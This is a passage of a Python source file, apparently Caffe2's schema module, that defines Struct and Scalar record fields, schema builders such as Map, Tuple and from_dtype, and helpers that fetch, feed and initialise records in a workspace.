        if item.startswith('__'):
            raise AttributeError(item)
        try:
            return self.__dict__['fields'][item]
        except KeyError:
            raise AttributeError(item)

    def __setattr__(self, key, value):
        # Disable setting attributes after initialization to prevent false
        # impression of being able to overwrite a field.
        # Allowing setting internal states mainly so that _parent can be set
        # post initialization.
        if getattr(self, '_frozen', None) and not key.startswith('_'):
            raise TypeError('Struct.__setattr__() is disabled after __init__()')
        super(Struct, self).__setattr__(key, value)

    def __add__(self, other):
        """
        Allows to merge fields of two schema.Struct using '+' operator.
        If two Struct have common field names, the merge is conducted
        recursively. Here are examples:

        Example 1
        s1 = Struct(('a', Scalar()))
        s2 = Struct(('b', Scalar()))
        s1 + s2 == Struct(
            ('a', Scalar()),
            ('b', Scalar()),
        )

        Example 2
        s1 = Struct(
            ('a', Scalar()),
            ('b', Struct(('c', Scalar()))),
        )
        s2 = Struct(('b', Struct(('d', Scalar()))))
        s1 + s2 == Struct(
            ('a', Scalar()),
            ('b', Struct(
                ('c', Scalar()),
                ('d', Scalar()),
            )),
        )
        """
        if not isinstance(other, Struct):
            return NotImplemented

        children = OrderedDict(self.get_children())
        for name, right_field in other.get_children():
            if name not in children:
                children[name] = right_field
                continue
            # Common name: merge recursively (Struct + Struct).
            left_field = children[name]
            children[name] = left_field + right_field

        return Struct(*(viewitems(children)))

    def __sub__(self, other):
        """
        Allows to remove common fields of two schema.Struct from self by
        using '-' operator. If two Struct have common field names, the
        removal is conducted recursively. If a child struct has no fields
        inside, it will be removed from its parent. Here are examples:

        Example 1
        s1 = Struct(
            ('a', Scalar()),
            ('b', Scalar()),
        )
        s2 = Struct(('a', Scalar()))
        s1 - s2 == Struct(('b', Scalar()))

        Example 2
        s1 = Struct(
            ('b', Struct(
                ('c', Scalar()),
                ('d', Scalar()),
            ))
        )
        s2 = Struct(
            ('b', Struct(('c', Scalar()))),
        )
        s1 - s2 == Struct(
            ('b', Struct(
                ('d', Scalar()),
            )),
        )

        Example 3
        s1 = Struct(
            ('a', Scalar()),
            ('b', Struct(
                ('d', Scalar()),
            ))
        )
        s2 = Struct(
            ('b', Struct(
                ('c', Scalar()),
                ('d', Scalar()),
            )),
        )
        s1 - s2 == Struct(
            ('a', Scalar()),
        )
        """
        if not isinstance(other, Struct):
            return NotImplemented

        children = OrderedDict(self.get_children())
        for name, right_field in other.get_children():
            if name in children:
                left_field = children[name]
                if type(left_field) == type(right_field):
                    if isinstance(left_field, Struct):
                        # Recurse; keep the child only if fields remain.
                        child = left_field - right_field
                        if child.get_children():
                            children[name] = child
                            continue
                    children.pop(name)
                else:
                    raise TypeError(
                        "Type of left_field, " + str(type(left_field)) +
                        ", is not the same as that of right_field, " +
                        str(type(right_field)) +
                        ", yet they have the same field name, " + name)
        return Struct(*(children.items()))
class Scalar(Field):
    """Represents a typed scalar or tensor of fixed shape.

    A Scalar is a leaf in a schema tree, translating to exactly one tensor in
    the dataset's underlying storage.

    Usually, the tensor storing the actual values of this field is a 1D tensor,
    representing a series of values in its domain. It is possible however to
    have higher rank values stored as a Scalar, as long as all entries have
    the same shape.

    E.g.:

        Scalar(np.float64)

            Scalar field of type float64. Caffe2 will expect readers and
            datasets to expose it as a 1D tensor of doubles (vector), where
            the size of the vector is determined by this fields' domain.

        Scalar((np.int32, 5))

            Tensor field of type int32. Caffe2 will expect readers and
            datasets to implement it as a 2D tensor (matrix) of shape (L, 5),
            where L is determined by this fields' domain.

        Scalar((str, (10, 20)))

            Tensor field of type str. Caffe2 will expect readers and
            datasets to implement it as a 3D tensor of shape (L, 10, 20),
            where L is determined by this fields' domain.

    If the field type is unknown at construction time, call Scalar(), that will
    default to np.void as its dtype.

    It is an error to pass a structured dtype to Scalar, since it would contain
    more than one field. Instead, use from_dtype, which will construct
    a nested `Struct` field reflecting the given dtype's structure.

    A Scalar can also contain a blob, which represents the value of this
    Scalar. A blob can be either a numpy.ndarray, in which case it contains the
    actual contents of the Scalar, or a BlobReference, which represents a
    blob living in a caffe2 Workspace. If blob of different types are passed,
    a conversion to numpy.ndarray is attempted.
    """

    def __init__(self, dtype=None, blob=None, metadata=None):
        self._metadata = None
        # unsafe=True suppresses the immutability warning during setup.
        self.set(dtype, blob, metadata, unsafe=True)
        Field.__init__(self, [])

    def field_names(self):
        # A Scalar is a leaf: it contributes exactly one, unnamed field.
        return ['']

    def field_type(self):
        return self.dtype

    def field_types(self):
        return [self.dtype]

    def field_metadata(self):
        return [self._metadata]

    def has_blobs(self):
        return self._blob is not None

    def field_blobs(self):
        assert self._blob is not None, 'Value is not set for this field.'
        return [self._blob]

    def all_scalars(self):
        return [self]

    def clone(self, keep_blobs=True):
        # Clone from the dtype as originally passed, not the inferred one.
        return Scalar(
            dtype=self._original_dtype,
            blob=self._blob if keep_blobs else None,
            metadata=self._metadata
        )

    def get(self):
        """Gets the current blob of this Scalar field."""
        assert self._blob is not None, 'Value is not set for this field.'
        return self._blob

    def __call__(self):
        """Shortcut for self.get()"""
        return self.get()

    @property
    def metadata(self):
        return self._metadata

    def set_metadata(self, value):
        assert isinstance(value, Metadata), \
            'metadata must be Metadata, got {}'.format(type(value))
        self._metadata = value
        self._validate_metadata()

    def _validate_metadata(self):
        if self._metadata is None:
            return
        # categorical_limit only makes sense for integral dtypes.
        if (self._metadata.categorical_limit is not None and
                self.dtype is not None):
            assert np.issubdtype(self.dtype, np.integer), \
                "`categorical_limit` can be specified only in integral " + \
                "fields but got {}".format(self.dtype)

    def set_value(self, blob, throw_on_type_mismatch=False, unsafe=False):
        """Sets only the blob field still validating the existing dtype"""
        if self.dtype.base != np.void and throw_on_type_mismatch:
            assert isinstance(blob, np.ndarray), "Got {!r}".format(blob)
            assert blob.dtype.base == self.dtype.base, (
                "Expected {}, got {}".format(self.dtype.base, blob.dtype.base))
        self.set(dtype=self._original_dtype, blob=blob, unsafe=unsafe)

    def set(self, dtype=None, blob=None, metadata=None, unsafe=False):
        """Set the type and/or blob of this scalar. See __init__ for details.

        Args:
            dtype: can be any numpy type. If not provided and `blob` is
                provided, it will be inferred. If no argument is provided,
                this Scalar will be of type np.void.
            blob: if provided, can be either a BlobReference or a
                numpy.ndarray. If a value of different type is passed,
                a conversion to numpy.ndarray is attempted. Strings aren't
                accepted, since they can be ambiguous. If you want to pass
                a string, to either BlobReference(blob) or np.array(blob).
            metadata: optional instance of Metadata, if provided overrides
                the metadata information of the scalar
        """
        if not unsafe:
            logger.warning(
                "Scalar should be considered immutable. Only call Scalar.set() "
                "on newly created Scalar with unsafe=True. This will become an "
                "error soon."
            )
        if blob is not None and isinstance(blob, basestring):
            raise ValueError(
                'Passing str blob to Scalar.set() is ambiguous. '
                'Do either set(blob=np.array(blob)) or '
                'set(blob=BlobReference(blob))'
            )

        self._original_dtype = dtype
        if dtype is not None:
            dtype = np.dtype(dtype)
        # If blob is not None and it is not a BlobReference, we assume that
        # it is actual tensor data, so we will try to cast it to a numpy array.
        if blob is not None and not isinstance(blob, BlobReference):
            preserve_shape = isinstance(blob, np.ndarray)
            if dtype is not None and dtype != np.void:
                blob = np.array(blob, dtype=dtype.base)
                # if array is empty we may need to reshape a little
                if blob.size == 0 and not preserve_shape:
                    blob = blob.reshape((0, ) + dtype.shape)
            else:
                assert isinstance(blob, np.ndarray), (
                    'Invalid blob type: %s' % str(type(blob)))

            # reshape scalars into 1D arrays
            # TODO(azzolini): figure out better way of representing this
            if len(blob.shape) == 0 and not preserve_shape:
                blob = blob.reshape((1, ))

            # infer inner shape from the blob given
            # TODO(dzhulgakov): tweak this to make it work with PackedStruct
            if (len(blob.shape) > 1 and dtype is not None and
                    dtype.base != np.void):
                dtype = np.dtype((dtype.base, blob.shape[1:]))
        # if we were still unable to infer the dtype
        if dtype is None:
            dtype = np.dtype(np.void)
        assert not dtype.fields, (
            'Cannot create Scalar with a structured dtype. ' +
            'Use from_dtype instead.'
        )
        self.dtype = dtype
        self._blob = blob
        if metadata is not None:
            self.set_metadata(metadata)
        self._validate_metadata()

    def set_type(self, dtype):
        self._original_dtype = dtype
        if dtype is not None:
            self.dtype = np.dtype(dtype)
        else:
            self.dtype = np.dtype(np.void)
        self._validate_metadata()

    def __repr__(self):
        return 'Scalar({!r}, {!r}, {!r})'.format(
            self.dtype, self._blob, self._metadata)

    def id(self):
        """
        Return the zero-indexed position of this scalar field in its schema.
        Used in order to index into the field_blob list returned by readers or
        accepted by writers.
        """
        return self._child_base_id()
def Map(
    keys,
    values,
    keys_name='keys',
    values_name='values',
    lengths_blob=None
):
    """A map is a List of Struct containing keys and values fields.
    Optionally, you can provide custom name for the key and value fields.
    """
    entry = Struct((keys_name, keys), (values_name, values))
    return List(entry, lengths_blob=lengths_blob)
def NamedTuple(name_prefix, *fields):
    """Creates a Struct with fields named `<name_prefix>_0`, `<name_prefix>_1`, ..."""
    named = [
        ('%s_%d' % (name_prefix, idx), field)
        for idx, field in enumerate(fields)
    ]
    return Struct(*named)
def Tuple(*fields):
    """
    Creates a Struct with default, sequential, field names of given types.
    """
    # Delegates to NamedTuple with the default 'field' prefix.
    return NamedTuple('field', *fields)
def RawTuple(num_fields, name_prefix='field'):
    """
    Creates a tuple of `num_fields` untyped (np.void) scalars.
    """
    assert isinstance(num_fields, int)
    assert num_fields >= 0
    untyped = num_fields * [np.void]
    return NamedTuple(name_prefix, *untyped)
def from_dtype(dtype, _outer_shape=()):
    """Constructs a Caffe2 schema from the given numpy's dtype.

    Numpy supports scalar, array-like and structured datatypes, as long as
    all the shapes are fixed. This function breaks down the given dtype into
    a Caffe2 schema containing `Struct` and `Scalar` types.

    Fields containing byte offsets are not currently supported.
    """
    if not isinstance(dtype, np.dtype):
        # wrap into a ndtype
        shape = _outer_shape
        dtype = np.dtype((dtype, _outer_shape))
    else:
        # concatenate shapes if necessary
        shape = _outer_shape + dtype.shape
        if shape != dtype.shape:
            dtype = np.dtype((dtype.base, shape))

    if not dtype.fields:
        return Scalar(dtype)

    struct_fields = []
    # dtype.fields is a mapping of name -> (dtype, byte offset); iterating it
    # directly would yield only the names and fail to unpack, so use
    # viewitems().
    for name, (fdtype, offset) in viewitems(dtype.fields):
        assert offset == 0, ('Fields with byte offsets are not supported.')
        # Each entry must be a (name, field) pair; `+=` with a bare tuple
        # would extend the list with the name and field as separate items,
        # corrupting the Struct(*struct_fields) call below.
        struct_fields.append((name, from_dtype(fdtype, _outer_shape=shape)))
    return Struct(*struct_fields)
class _SchemaNode(object):
    """This is a private class used to represent a Schema Node"""

    def __init__(self, name, type_str=''):
        self.name = name
        self.children = []
        self.type_str = type_str
        # Set for leaves (the actual Scalar) and memoized by get_field().
        self.field = None

    def add_child(self, name, type_str=''):
        # Reuse an existing child with the same name and type so that columns
        # sharing a prefix end up under a single node.
        for child in self.children:
            if child.name == name and child.type_str == type_str:
                return child
        child = _SchemaNode(name, type_str)
        self.children.append(child)
        return child

    def get_field(self):
        # Children named exactly {lengths, values} indicate a List; exactly
        # {lengths, keys, values} indicate a Map; anything else is a Struct.
        list_names = ['lengths', 'values']
        map_names = ['lengths', 'keys', 'values']

        if len(self.children) == 0 or self.field is not None:
            assert self.field is not None
            return self.field

        child_names = []
        for child in self.children:
            child_names.append(child.name)

        if (set(child_names) == set(list_names)):
            for child in self.children:
                if child.name == 'values':
                    values_field = child.get_field()
                else:
                    lengths_field = child.get_field()
            self.field = List(
                values_field,
                lengths_blob=lengths_field
            )
            self.type_str = "List"
            return self.field
        elif (set(child_names) == set(map_names)):
            for child in self.children:
                if child.name == 'keys':
                    key_field = child.get_field()
                elif child.name == 'values':
                    values_field = child.get_field()
                else:
                    lengths_field = child.get_field()
            self.field = Map(
                key_field,
                values_field,
                lengths_blob=lengths_field
            )
            self.type_str = "Map"
            return self.field
        else:
            struct_fields = []
            for child in self.children:
                struct_fields.append((child.name, child.get_field()))
            self.field = Struct(*struct_fields)
            self.type_str = "Struct"
            return self.field

    def print_recursively(self):
        # Depth-first dump of the tree to the module logger (children first).
        for child in self.children:
            child.print_recursively()
        logger.info("Printing node: Name and type")
        logger.info(self.name)
        logger.info(self.type_str)
def from_column_list(
    col_names, col_types=None,
    col_blobs=None, col_metadata=None
):
    """
    Given a list of names, types, and optionally values, construct a Schema.

    Each entry of `col_names` may be a nested name (e.g. 'a:b:c'); the
    corresponding type/blob/metadata (when given) applies to the leaf Scalar.
    """
    if col_types is None:
        col_types = [None] * len(col_names)
    if col_metadata is None:
        col_metadata = [None] * len(col_names)
    if col_blobs is None:
        col_blobs = [None] * len(col_names)
    assert len(col_names) == len(col_types), (
        'col_names and col_types must have the same length.'
    )
    assert len(col_names) == len(col_metadata), (
        'col_names and col_metadata must have the same length.'
    )
    assert len(col_names) == len(col_blobs), (
        'col_names and col_blobs must have the same length.'
    )
    root = _SchemaNode('root', 'Struct')
    # NOTE: the loop variable is `col_md` (not `col_metadata`) so it does not
    # shadow the parameter, and the tree cursor is `next_node` so it does not
    # shadow the `next` builtin.
    for col_name, col_type, col_blob, col_md in zip(
        col_names, col_types, col_blobs, col_metadata
    ):
        columns = col_name.split(FIELD_SEPARATOR)
        current = root
        for i in range(len(columns)):
            name = columns[i]
            type_str = ''
            field = None
            if i == len(columns) - 1:
                # Leaf column: attach the Scalar carrying the actual data.
                type_str = col_type
                field = Scalar(
                    dtype=col_type,
                    blob=col_blob,
                    metadata=col_md
                )
            next_node = current.add_child(name, type_str)
            if field is not None:
                next_node.field = field
            current = next_node

    return root.get_field()
def from_blob_list(schema, values, throw_on_type_mismatch=False):
    """
    Create a schema that clones the given schema, but containing the given
    list of values.
    """
    assert isinstance(schema, Field), 'Argument `schema` must be a Field.'
    # A single BlobReference is treated as a one-element list.
    if isinstance(values, BlobReference):
        values = [values]
    record = schema.clone_schema()
    scalars = record.all_scalars()
    num_expected = len(scalars)
    assert num_expected == len(values), (
        'Values must have %d elements, got %d.' % (num_expected, len(values))
    )
    for scalar_field, blob_value in zip(scalars, values):
        scalar_field.set_value(blob_value, throw_on_type_mismatch, unsafe=True)
    return record
def as_record(value):
    """Normalize `value` into a schema Field.

    Fields pass through; a sequence of (name, value) pairs becomes a Struct;
    any other sequence becomes an anonymous Tuple; a dict becomes a Struct;
    everything else is normalized into a Scalar.
    """
    if isinstance(value, Field):
        return value
    elif isinstance(value, list) or isinstance(value, tuple):
        # BUG FIX: the original used `f is tuple`, an identity test against
        # the tuple *type* object, which is never true for actual tuples —
        # so named-field sequences were always mis-detected as plain Tuples.
        is_field_list = all(
            isinstance(f, tuple) and len(f) == 2 and isinstance(f[0], basestring)
            for f in value
        )
        if is_field_list:
            return Struct(* [(k, as_record(v)) for k, v in value])
        else:
            return Tuple(* [as_record(f) for f in value])
    elif isinstance(value, dict):
        return Struct(* [(k, as_record(v)) for k, v in viewitems(value)])
    else:
        return _normalize_field(value)
def FetchRecord(blob_record, ws=None, throw_on_type_mismatch=False):
    """
    Given a record containing BlobReferences, return a new record with same
    schema, containing numpy arrays, fetched from the current active workspace.
    """
    def fetch(ref):
        # With no explicit workspace, read from the global active workspace.
        if ws is None:
            return workspace.FetchBlob(str(ref))
        return ws.blobs[str(ref)].fetch()

    assert isinstance(blob_record, Field)
    field_blobs = blob_record.field_blobs()
    assert all(isinstance(b, BlobReference) for b in field_blobs)
    fetched = [fetch(b) for b in field_blobs]
    return from_blob_list(blob_record, fetched, throw_on_type_mismatch)
def FeedRecord(blob_record, arrays, ws=None):
    """
    Given a Record containing blob_references and arrays, which is either
    a list of numpy arrays or a Record containing numpy arrays, feeds the
    record to the current workspace.
    """
    def feed(ref, value):
        # With no explicit workspace, write to the global active workspace.
        if ws is None:
            workspace.FeedBlob(str(ref), value)
        else:
            ws.create_blob(str(ref))
            ws.blobs[str(ref)].feed(value)

    assert isinstance(blob_record, Field)
    field_blobs = blob_record.field_blobs()
    assert all(isinstance(b, BlobReference) for b in field_blobs)

    if isinstance(arrays, Field):
        # TODO: check schema
        arrays = arrays.field_blobs()
    assert len(arrays) == len(field_blobs), (
        'Values must contain exactly %d ndarrays.' % len(field_blobs)
    )
    for ref, value in zip(field_blobs, arrays):
        feed(ref, value)
def NewRecord(net, schema):
    """
    Given a record of np.arrays, create a BlobReference for each one of them,
    returning a record containing BlobReferences. The name of each returned blob
    is NextScopedBlob(field_name), which guarantees unique name in the current
    net. Use NameScope explicitly to avoid name conflictions between different
    nets.
    """
    if isinstance(schema, Scalar):
        # A bare Scalar gets a single scoped blob with a generic name.
        result = schema.clone()
        result.set_value(
            blob=net.NextScopedBlob('unnamed_scalar'),
            unsafe=True,
        )
        return result

    assert isinstance(schema, Field), 'Record must be a schema.Field instance.'
    blob_refs = [
        net.NextScopedBlob(prefix=field_name)
        for field_name in schema.field_names()
    ]
    return from_blob_list(schema, blob_refs)
def ConstRecord(net, array_record):
    """
    Given a record of arrays, returns a record of blobs,
    initialized with net.Const.
    """
    blob_record = NewRecord(net, array_record)
    pairs = zip(blob_record.field_blobs(), array_record.field_blobs())
    for blob_ref, array in pairs:
        net.Const(array, blob_ref)
    return blob_record
def InitEmptyRecord(net, schema_or_record, enforce_types=False):
    # Ensure the record has blobs: create scoped ones when given a bare schema.
    if not schema_or_record.has_blobs():
        record = NewRecord(net, schema_or_record)
    else:
        record = schema_or_record

    # Fill each blob with an empty (0-length) tensor of the field's type.
    for blob_type, blob in zip(record.field_types(), record.field_blobs()):
        try:
            data_type = data_type_for_dtype(blob_type)
            shape = [0] + list(blob_type.shape)
            net.ConstantFill([], blob, shape=shape, dtype=data_type)
        except TypeError:
            # If data_type_for_dtype doesn't know how to resolve given numpy
            # type to core.DataType, that function can throw type error (for
            # example that would happen for cases of unknown types such as
            # np.void). This is not a problem for cases when the record if going
            # to be overwritten by some operator later, though it might be an
            # issue for type/shape inference.
            if enforce_types:
                raise
            # If we don't enforce types for all items we'll create a blob with
            # the default ConstantFill (FLOAT, no shape)
            net.ConstantFill([], blob, shape=[0])

    return record
# Mapping from numpy scalar types to core.DataType values; consumed by
# data_type_for_dtype() below via `dtype.base == np_type` comparisons.
# NOTE: `str` and `bool` are used directly — `np.str` and `np.bool` were
# mere aliases for the builtins and were removed in NumPy 1.24, so relying
# on them breaks under modern NumPy while behaving identically on old ones.
_DATA_TYPE_FOR_DTYPE = [
    (str, core.DataType.STRING),
    (np.float32, core.DataType.FLOAT),
    (np.float64, core.DataType.DOUBLE),
    (bool, core.DataType.BOOL),
    (np.int8, core.DataType.INT8),
    (np.int16, core.DataType.INT16),
    (np.int32, core.DataType.INT32),
    (np.int64, core.DataType.INT64),
    (np.uint8, core.DataType.UINT8),
    (np.uint16, core.DataType.UINT16),
]
def is_schema_subset(schema, original_schema):
    """Return True if every field name of `schema` exists in `original_schema`."""
    # TODO add more checks
    original_names = set(original_schema.field_names())
    return set(schema.field_names()) <= original_names
def equal_schemas(schema,
                  original_schema,
                  check_field_names=True,
                  check_field_types=True,
                  check_field_metas=False):
    """Compare two schemas on names, types and (optionally) metadata.

    Each comparison can be toggled independently; by default metadata is
    not compared.
    """
    assert isinstance(schema, Field)
    assert isinstance(original_schema, Field)

    comparisons = (
        (check_field_names, lambda s: s.field_names()),
        (check_field_types, lambda s: s.field_types()),
        (check_field_metas, lambda s: s.field_metadata()),
    )
    for enabled, extract in comparisons:
        if enabled and extract(schema) != extract(original_schema):
            return False
    return True
def schema_check(schema, previous=None):
    """Normalize `schema` into a record, asserting equality with `previous` when given."""
    normalized = as_record(schema)
    if previous is not None:
        assert equal_schemas(schema, previous)
    return normalized
def data_type_for_dtype(dtype):
    """Map a numpy dtype to its core.DataType; raises TypeError when unknown."""
    base = dtype.base
    for np_type, data_type in _DATA_TYPE_FOR_DTYPE:
        if base == np_type:
            return data_type
    raise TypeError('Unknown dtype: ' + str(base))
def attach_metadata_to_scalars(field, metadata):
    """Set `metadata` on every Scalar reachable from `field`."""
    for scalar in field.all_scalars():
        scalar.set_metadata(metadata)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.